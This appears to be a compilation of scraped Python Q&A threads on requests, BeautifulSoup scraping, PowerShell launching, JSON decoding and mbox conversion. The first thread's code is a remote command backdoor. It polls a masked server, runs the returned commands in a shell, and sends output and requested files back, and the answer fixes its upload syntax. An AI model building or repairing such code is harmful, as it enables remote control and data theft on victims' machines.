Send file using POST requests in Python3 [ error: invalid syntax ] - python-3.x

I am trying to send a file using the POST method of the requests module in Python 3.5, but I get an "invalid syntax" error on these lines:
files = ('file':open(path,'rb'))
r = requests.post(('htttp://#########', files= files))
The full code is as follows:
import requests
import subprocess
import time
import os
while True:
    req = requests.get('htttp://########')
    command = req.text
    if 'terminate' in command:
        break
    elif 'grab' in command:
        grab,path = command.split('*')
        if os.path.exists(path):
            url = 'http://#########/store'
            files = ('file':open(path,'rb'))
            r = requests.post(('htttp://#########', files= files))
        else:
            post_request = requests.post(url='htttp://#########', data='[-] Unable to find file !')
    else:
        CMD = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE,
                               stdin=subprocess.PIPE, stdout=subprocess.PIPE)
        post_request = requests.post(url='htttp://########', data=CMD.stdout.read())
        post_request = requests.post(url='htttp://######', data=CMD.stderr.read())
    time.sleep(3)

You probably want this:
files = {'file': open(path, 'rb')}
r = requests.post('htttp://#########', files=files)
Dicts are created with curly braces, not parentheses, and there was an extra pair of parentheses around the arguments in your call to requests.post.
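As a side note, it is safer to open the file in a with block so the handle is closed once the upload finishes. A minimal sketch of the same request (the URL placeholder and path come from the question):

with open(path, 'rb') as f:
    files = {'file': f}
    r = requests.post('http://#########/store', files=files)
print(r.status_code)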

Related

Problem Scraping Wikipedia Images via Python

I wrote a Python program to scrape the first image link for a query on Wikipedia (the original question included an example image).
My program requires these libraries:
requests
bs4
html
re
When I run my code and give it an argument, it returns one of my defined errors ('Image-Not-Found'). Please help me solve the problem.
My program's source code:
import requests
import bs4
import re
import html
import argparse  # needed for the ArgumentParser below

# Create the parser
my_parser = argparse.ArgumentParser(description='Wikipedia Image Grabber')
# Add the arguments
my_parser.add_argument('Phrase',
                       metavar='Phrase',
                       type=str,
                       help='Phrase to Search')
# Execute the parse_args() method
args = my_parser.parse_args()
Phrase = args._get_kwargs()[0][1]
if '.' in Phrase or '-' in Phrase:
    if '.' in Phrase and '-' in Phrase:
        Phrase = str(Phrase).replace('-',' ')
    elif '-' in Phrase and not '.' in Phrase:
        Phrase = str(Phrase).replace('-',' ')
Phrase = html.escape(Phrase)
request = requests.get('https://fa.wikipedia.org/wiki/Special:Search?search=%s&go=Go&ns0=1' % Phrase).text
parser = bs4.BeautifulSoup(request, 'html.parser')
none_search_finder = parser.find_all('p', attrs={'class':'mw-search-nonefound'})
if len(none_search_finder)==1:
    print('No-Result')
    exit()
else:
    search_results = parser.find_all('div', attrs={'class':'mw-search-result-heading'})
    if len(search_results)==0:
        search_result = parser.find_all('h1', attrs={'id':'firstHeading'})
        if len(search_result)!=0:
            link = 'https://fa.wikipedia.org/wiki/'+str(Phrase)
        else:
            print('Result-Error')
            exit()
    else:
        selected_result = search_results[0]
        regex_exp = r".*<a href=\"(.*)\" title="
        regex_get_uri = re.findall(regex_exp, str(selected_result))
        regex_result = str(regex_get_uri[0])
        link = 'https://fa.wikipedia.org'+regex_result
#---------------
second_request = requests.get(link)
second_request_source = second_request.text
second_request_parser = bs4.BeautifulSoup(second_request_source, 'html.parser')
image_finder = second_request_parser.find_all('a', attrs={'class':'image'})
if len(image_finder) == 0:
    print('No-Image')
    exit()
else:
    image_finder_e = image_finder[0]
    second_regex = r".*src=\"(.*)\".*decoding=\"async\""
    regex_finder = re.findall(second_regex, str(image_finder_e))
    if len(regex_finder)!=0:
        regexed_uri = str(regex_finder[0])
        img_link = regexed_uri.replace('//','https://')
        print(img_link)
    else:
        print("Image-Not-Found")
You can do it without regex. The reason your code is not working is that the position of decoding="async" in the HTML you get back is not the same as what you see in the browser.
Here is a solution without regex.
import requests
from bs4 import BeautifulSoup

url = 'https://en.wikipedia.org/wiki/Google'
soup = BeautifulSoup(requests.get(url).text, 'html.parser')
imglinks = soup.find_all('a', attrs={'class': 'image'})[0]
for img in imglinks.find_all('img'):
    print(img['src'].replace('//', 'https://'))
Output:
https://upload.wikimedia.org/wikipedia/commons/thumb/2/2f/Google_2015_logo.svg/196px-Google_2015_logo.svg.png
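Reading the src attribute directly, as above, also sidesteps the attribute-ordering problem the regex runs into. One further tweak, which is my suggestion rather than part of the answer: Wikipedia serves protocol-relative URLs like //upload.wikimedia.org/..., so prepending the scheme only when the URL starts with // is a bit safer than a blanket replace('//', 'https://'):

import requests
from bs4 import BeautifulSoup

url = 'https://en.wikipedia.org/wiki/Google'
soup = BeautifulSoup(requests.get(url).text, 'html.parser')
anchor = soup.find('a', attrs={'class': 'image'})
if anchor is not None and anchor.find('img') is not None:
    src = anchor.find('img')['src']
    # Prepend the scheme only for protocol-relative URLs.
    print('https:' + src if src.startswith('//') else src)
else:
    print('No-Image')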

PowerShell script keeps going missing after extraction of zip folder using Python script

I am writing a Python script to download a zip file from a URL, extract it, and then run a PowerShell script to install the service.
Things work well with downloading and extracting the zip, but when I try to run the PowerShell script I get a file-not-found error; the script is suddenly missing.
When I try to copy it from another folder it does not show up, and it is also missing from the source folder.
Please help me understand this problem.
import os
import zipfile
import subprocess
import requests

def make_zip(name):
    cur_dir = os.getcwd()
    with zipfile.ZipFile(name, "w") as z:
        return True

def download(name):
    url = "https://XXXXX/downloads/XXX-7.8.0-windows-x86_64.zip"
    response = requests.get(url, stream=True)
    handle = open(name, "wb")
    for chunk in response.iter_content(chunk_size=512):
        if chunk:
            handle.write(chunk)
    handle.close()

def extract(name):
    cur_dir = os.getcwd()
    with zipfile.ZipFile(name, 'r') as z:
        z.extractall(cur_dir)

def install(service):
    service = "test.ps1"
    command_options = ["PowerShell.exe", "-ExecutionPolicy", "UnRestricted", "-File", service]
    process_result = subprocess.run(command_options, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                    universal_newlines=True)  # CALL PROCESS
    print(process_result.returncode)  # PRINT RETURN CODE OF PROCESS 0 = SUCCESS, NON-ZERO = FAIL
    print(process_result.stdout)      # PRINT STANDARD OUTPUT FROM POWERSHELL
    print(process_result.stderr)      # PRINT STANDARD ERROR FROM POWERSHELL (IF ANY, OTHERWISE NULL|NONE)
    if process_result.returncode == 0:  # COMPARING RESULT
        Message = "Success !"
    else:
        Message = "Error Occurred !"

make_zip('example')  # creates example zip file
download('example')  # downloads the url file into example zip
extract('example')   # extracts the zip
install('example')   # to install the service

Get API response chunk encoded. ERROR: data byte not string (ubuntu)

I have some code that works when I run it on a Windows machine, but when it runs in Ubuntu on a Google Compute Engine VM I get the following error:
Traceback (most recent call last):
  File "firehose_get.py", line 43, in <module>
    print(json.dumps(json.loads(line),indent=2))
  File "/home/stuartkirkup/anaconda3/lib/python3.5/json/__init__.py", line 312, in loads
    s.__class__.__name__))
TypeError: the JSON object must be str, not 'bytes'
It's exactly the same code that runs fine on Windows. I've done quite a bit of reading and it looks like an encoding issue; as you'll see from some of the commented-out sections in my code, I've tried a few ways to change the encoding, but without joy. I can't work out how to debug it ... I'm fairly new to Python.
I'm using Anaconda, and some further reading says it has an ill-advised setdefaultencoding hack built in.
Here is the stream header showing it's chunked data, which I believe is why it's bytes:
{'Transfer-Encoding': 'chunked', 'Date': 'Thu, 17 Aug 2017 16:53:35 GMT', 'Content-Type': 'application/json', 'x-server': 'db220', 'Content-Encoding': 'gzip'}
Code file - firehose_requests.py (with API key info replaced by ####)
import requests

MAX_REDIRECTS = 1000

def get(url, **kwargs):
    kwargs.setdefault('allow_redirects', False)
    for i in range(0, MAX_REDIRECTS):
        response = requests.get(url, **kwargs)
        #response.encoding = 'utf-8'
        print("test")
        print(response.headers)
        if response.status_code == requests.codes.moved or \
           response.status_code == requests.codes.found:
            if 'Location' in response.headers:
                url = response.headers['Location']
                content_type_header = response.headers.get('content_type')
                print(content_type_header)
                continue
            else:
                print("Error when reading the Location field from HTTP headers")
        return response
Code file - firehose_get.py
import json
import requests
from time import sleep
import argparse
#import ConfigParser
import firehose_requests
from requests.auth import HTTPBasicAuth

# Make it work for Python 2+3 and with Unicode
import io
try:
    to_unicode = unicode
except NameError:
    to_unicode = str

#request a token from Adobe
request_access_token = requests.post('https://api.omniture.com/token', data={'grant_type':'client_credentials'}, auth=HTTPBasicAuth('##############-livestream-poc','488##############1')).json()
#print(request_access_token)

#grab the token from the JSON returned
access_token = request_access_token["access_token"]
print(access_token)

url = 'https://livestream.adobe.net/api/1/stream/eecoukvanilla-##############'
sleep_sec = 0
rec_count = 10

bearer = "Bearer " + access_token
headers = {"Authorization": bearer, "accept-encoding": "gzip,deflate"}

r = firehose_requests.get(url, stream=True, headers=headers)

#open empty file
with open('output_file2.txt', 'w') as outfile:
    print('', file=outfile)

#Read the Stream
if r.status_code == requests.codes.ok:
    count = 0
    for line in r.iter_lines():
        if line:
            #write to screen
            print("\r\n")
            print(json.dumps(json.loads(line), indent=2))
            #append data to file
            with open('output_file2.txt', 'a') as outfile:
                print("\r\n", file=outfile)
                print(json.dumps(json.loads(line), ensure_ascii=False), file=outfile)
            #with io.open('output_file2.txt', 'w', encoding='utf8') as outfile:
            #    str_ = json.dumps(json.loads(line),
            #                      indent=4, sort_keys=True,
            #                      separators=(',', ': '), ensure_ascii=False)
            #    outfile.write(to_unicode(str_))
            #Break the loop if there is a -n argument
            if rec_count is not None:
                count = count + 1
                if count >= rec_count:
                    break
            #How long to wait between writes
            if sleep_sec is not None:
                sleep(sleep_sec)
else:
    print("There was a problem with the Request")
    print("Returned Status Code: " + str(r.status_code))
Thanks
OK, I worked it out. I found a lot of people also getting this error but no solutions posted, so this is how I did it:
parse and decode the JSON like this
json_parsed = json.loads(line.decode("utf-8"))
Full code:
import json
import requests
from time import sleep
import argparse
#import ConfigParser
import firehose_requests
from requests.auth import HTTPBasicAuth

# Make it work for Python 2+3 and with Unicode
import io
try:
    to_unicode = unicode
except NameError:
    to_unicode = str

#request a token from Adobe
request_access_token = requests.post('https://api.omniture.com/token', data={'grant_type':'client_credentials'}, auth=HTTPBasicAuth('##########-livestream-poc','488################1')).json()
#print(request_access_token)

#grab the token from the JSON returned
access_token = request_access_token["access_token"]
print(access_token)

url = 'https://livestream.adobe.net/api/1/stream/##################'
sleep_sec = 0
rec_count = 10

bearer = "Bearer " + access_token
headers = {"Authorization": bearer, "accept-encoding": "gzip,deflate"}

r = firehose_requests.get(url, stream=True, headers=headers)

#open empty file
with open('output_file.txt', 'w') as outfile:
    print('', file=outfile)

#Read the Stream
if r.status_code == requests.codes.ok:
    count = 0
    for line in r.iter_lines():
        if line:
            #parse and decode the JSON
            json_parsed = json.loads(line.decode("utf-8"))
            #write to screen
            #print(str(json_parsed))
            #append data to file
            with open('output_file.txt', 'a') as outfile:
                #write to file
                print(json_parsed, file=outfile)
            #Break the loop if there is a -n argument
            if rec_count is not None:
                count = count + 1
                if count >= rec_count:
                    break
            #How long to wait between writes
            if sleep_sec is not None:
                sleep(sleep_sec)
else:
    print("There was a problem with the Request")
    print("Returned Status Code: " + str(r.status_code))

segmentation fault in python3

I am running python3 on an Ubuntu machine and have noticed that the following block of code is fickle. Sometimes it runs just fine, other times it produces a segmentation fault. I don't understand why. Can someone explain what might be going on?
Basically, the code tries to read the list of S&P 500 constituents from Wikipedia and write the tickers to a file in the same directory as the script. If no connection to Wikipedia can be established, the script instead tries to read an existing list from that file.
from urllib import request
from urllib.error import URLError
from bs4 import BeautifulSoup
import os
import pickle
import dateutil.relativedelta as dr
import sys

sys.setrecursionlimit(100000)

def get_standard_and_poors_500_constituents():
    fname = (
        os.path.abspath(os.path.dirname(__file__)) + "/sp500_constituents.pkl"
    )
    try:
        # URL request, URL opener, read content.
        req = request.Request(
            "http://en.wikipedia.org/wiki/List_of_S%26P_500_companies"
        )
        opener = request.urlopen(req)
        # Convert bytes to UTF-8.
        content = opener.read().decode()
        soup = BeautifulSoup(content, "lxml")
        # HTML table we actually need is the first.
        tables = soup.find_all("table")
        external_class = tables[0].findAll("a", {"class": "external text"})
        c = [ext.string for ext in external_class if not "reports" in ext]
        with open(fname, "wb") as f:
            pickle.dump(c, f)
    except URLError:
        with open(fname, "rb") as f:
            c = pickle.load(f)
    finally:
        return c

sp500_constituents = get_standard_and_poors_500_constituents()
spdr_etf = "SPY"
sp500_index = "^GSPC"

def main():
    X = get_standard_and_poors_500_constituents()
    print(X)

if __name__ == "__main__":
    main()

How to convert an mbox to a JSON structure?

I am trying to convert an mbox to a JSON structure suitable for import into MongoDB.
I am using the mailbox chapter from Mining the Social Web, Second Edition, but it's not working properly.
import sys
import mailbox
import email
import quopri
import json
import time
from BeautifulSoup import BeautifulSoup
from dateutil.parser import parse

MBOX = 'resources/ch06-mailboxes/data/enron.mbox'
OUT_FILE = MBOX + '.json'

def cleanContent(msg):
    # Decode message from "quoted printable" format, but first
    # re-encode, since decodestring will try to do a decode of its own
    msg = quopri.decodestring(msg.encode('utf-8'))
    # Strip out HTML tags, if any are present.
    # Bail on unknown encodings if errors happen in BeautifulSoup.
    try:
        soup = BeautifulSoup(msg)
    except:
        return ''
    return ''.join(soup.findAll(text=True))

# There's a lot of data to process, and the Pythonic way to do it is with a
# generator. See http://wiki.python.org/moin/Generators.
# Using a generator requires a trivial encoder to be passed to json for object
# serialization.
class Encoder(json.JSONEncoder):
    def default(self, o): return list(o)

# The generator itself...
def gen_json_msgs(mb):
    while 1:
        msg = mb.next()
        if msg is None:
            break
        yield jsonifyMessage(msg)

def jsonifyMessage(msg):
    json_msg = {'parts': []}
    for (k, v) in msg.items():
        json_msg[k] = v.decode('utf-8', 'ignore')
    # The To, Cc, and Bcc fields, if present, could have multiple items.
    # Note that not all of these fields are necessarily defined.
    for k in ['To', 'Cc', 'Bcc']:
        if not json_msg.get(k):
            continue
        json_msg[k] = json_msg[k].replace('\n', '').replace('\t', '').replace('\r', '')\
                                 .replace(' ', '').decode('utf-8', 'ignore').split(',')
    for part in msg.walk():
        json_part = {}
        if part.get_content_maintype() != 'text':
            print >> sys.stderr, "Skipping MIME content in JSONification ({0})".format(part.get_content_maintype())
            continue
        json_part['contentType'] = part.get_content_type()
        content = part.get_payload(decode=False).decode('utf-8', 'ignore')
        json_part['content'] = cleanContent(content)
        json_msg['parts'].append(json_part)
    # Finally, convert date from asctime to milliseconds since epoch using the
    # $date descriptor so it imports "natively" as an ISODate object in MongoDB
    then = parse(json_msg['Date'])
    millis = int(time.mktime(then.timetuple())*1000 + then.microsecond/1000)
    json_msg['Date'] = {'$date': millis}
    return json_msg

mbox = mailbox.UnixMailbox(open(MBOX, 'rb'), email.message_from_file)

# Write each message out as a JSON object on a separate line
# for easy import into MongoDB via mongoimport
f = open(OUT_FILE, 'w')
for msg in gen_json_msgs(mbox):
    if msg != None:
        f.write(json.dumps(msg, cls=Encoder) + '\n')
f.close()

print "All done"
getting error:
     80 # for easy import into MongoDB via mongoimport
     81
---> 82 f = open(OUT_FILE, 'w')
     83 for msg in gen_json_msgs(mbox):
     84     if msg != None:

IOError: [Errno 13] Permission denied: 'resources/ch06-mailboxes/data/enron.mbox.json'
The code you mentioned became obsolete in the Third Edition of Mining the Social Web.
I tried making a workable script that not only converts MBOX to JSON but also extracts the attachments to usable formats.
Link to the repo:
https://github.com/PS1607/mbox-to-json
Read the README file for usage instructions.
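For reference, here is a minimal Python 3 sketch of the same idea using only the standard-library mailbox and json modules (my own illustration reusing the question's file paths, not the repo's code or the book's): it keeps the text parts of each message and writes one JSON object per line, which mongoimport can read.

import json
import mailbox

MBOX = 'resources/ch06-mailboxes/data/enron.mbox'  # path from the question
OUT_FILE = MBOX + '.json'

def jsonify_message(msg):
    # Copy the headers, then collect the text/* parts.
    doc = {k: v for k, v in msg.items()}
    doc['parts'] = []
    for part in msg.walk():
        if part.get_content_maintype() != 'text':
            continue
        payload = part.get_payload(decode=True) or b''
        doc['parts'].append({
            'contentType': part.get_content_type(),
            'content': payload.decode('utf-8', 'ignore'),
        })
    return doc

with open(OUT_FILE, 'w') as f:
    for msg in mailbox.mbox(MBOX):
        f.write(json.dumps(jsonify_message(msg)) + '\n')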
It seems that your problem is related to user permissions instead of Python. Line 82 tries to open a file in the "data" folder, but permission was denied. You should try executing your script using the sudo command from a terminal:
sudo python3 <your script name>
This should take care of the error you pointed out.
PS: Python 3 uses print as a function; line 88 should read
print('All done')
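If you would rather not run the script with sudo, a quick way to confirm the diagnosis (my suggestion, reusing the question's folder path) is to check whether your user can write to the output directory:

import os
out_dir = 'resources/ch06-mailboxes/data'
print(os.access(out_dir, os.W_OK))  # False means your user cannot write there, so fix the folder's permissions or ownership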
